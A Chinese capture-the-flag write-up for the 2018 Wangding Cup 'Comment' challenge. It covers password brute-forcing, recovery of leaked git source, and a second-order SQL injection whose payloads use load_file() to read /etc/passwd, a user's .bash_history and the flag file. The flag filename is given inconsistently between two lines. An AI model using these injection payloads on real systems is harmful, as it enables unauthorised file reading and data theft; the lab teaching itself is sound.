[网鼎杯 2018]Comment(git源码修复&二次注入)
打开页面,发帖发现需要登录,账号给了,密码还有三位数没给
我们进行爆破
爆出来了,最后三位666,我们进行登录
然后扫描目录,发现git源码泄露
我们利用githacker得到源码
但这个文件不全,我们找一下历史漏洞
1 | git log --reflog |
我们就能得到完整源码了(wp找的,我没找到)
1 | <?php |
然后就是代码审计了
我们可以发现当do=write的时候,传入的信息都会进行转义,但是数据库会自动清除反斜杠,
do=comment的时候,可以发现直接从category这个字段进行查询,这就导致了二次注入
所以说那个转义函数根本起不到防护的作用
通过下面的sql语句来进行注入
1 | $sql = "insert into comment |
首先我们需要在界面看到sql注入后的回显
可以发现content这个变量最后会回显在我们的留言页面中,那么就通过他来输出我们的sql语句
然后闭合sql语句 由于内容太多了,采取/**/的批量注释方法,
payload
1 | title=23&category=1',content=database(),/*&content=3123 |
再让content = */#
提交之后会爆出库名
我们查看users
1 | title=23&category=1',content=user(),/*&content=3123 |
发现使用者是root权限
这样的话,一般 flag 就不会在数据库里面(因为如果在数据库中,不需要root权限)
所以sql注入读取本地文件 可以使用load_file()
玩过linux的都知道 /etc/passwd这里存储用户信息
payload
1 | category==213',content=(select load_file('/etc/passwd')),/* |
有个www用户
查看bash_history : 保存了当前用户使用过的历史命令,方便查找
在/home/www/下
1 | 213',content=(select load_file('/home/www/.bash_history')),/* |
看见他删除了 .DS_Store 文件,由于目标环境是docker,所以 .DS_Store 文件应该在 /tmp/html 中。而 .DS_Store 文件中,经常会有一些不可见的字符,可以使用hex函数对其进行16进制转换,
1 | 213 ',content=(select hex(load_file("/tmp/html/.DS_Store"))),/* |
出来一大窜16进制,我们放bp解码,flag在flag_8946e1f1ee3e40f.php
payload访问文件
1 | 213',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/* |
我们进行解码
得到flag